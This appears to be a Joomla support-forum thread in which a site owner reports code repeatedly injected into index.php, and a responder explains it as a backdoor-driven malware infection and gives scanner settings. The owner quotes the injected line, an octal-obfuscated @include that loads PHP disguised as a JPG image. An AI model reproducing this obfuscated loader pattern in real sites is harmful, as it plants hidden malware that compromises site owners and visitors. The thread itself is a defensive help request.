I'm having an issue with some code being injected into the index.php file in the root. I can remove it but it will be back in a day or two. Security Check is not showing any files changes if an integrity check is done and also it shows no malware? Have you seen this before? The inject code is @include("\151ma\147e\163/\142a\156n\145\162s\057\143l\145a\156\145\162\056j\160g");
Here is the complete file:
* @package Joomla.Site
* @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
* Define the application's minimum supported PHP version as a constant so it can be referenced within the application.
if (version_compare(PHP_VERSION, JOOMLA_MINIMUM_PHP, '<'))
die('Your host needs to use PHP ' . JOOMLA_MINIMUM_PHP . ' or higher to run this version of Joomla!');
// Saves the start time and memory usage.
$startTime = microtime(1);
$startMem = memory_get_usage();
* Constant that is checked in included files to prevent direct access.
* define() is used in the installation folder rather than "const" to not error for PHP 5.2 and lower
if (file_exists(__DIR__ . '/defines.php'))
include_once __DIR__ . '/defines.php';
require_once JPATH_BASE . '/includes/defines.php';
Yes, I have seen this many times before. I clean one or two sites infected with this malware every month. There should be a backdoor anywhere that allows the attackers to inject encoded code, usually at the beginning of some mandatory files, to load the malware (or perform some actions) everytime the site is visited.
But It's odd the file integrity scanner didn't show the change... maybe the original hash of the file was taken with that code and this is why you are not alerted about it. Regarding to the malware scanner, please be fully sure that it's configured to analyze the entire filesystem (Global configuration -> Malware scanner tab -> Timeline = Anytime) and also to look for suspicious patterns (Global configuration -> Malware scanner tab -> Deep scan = enabled).
If do you need help to clean the site just tell me and I will work on it.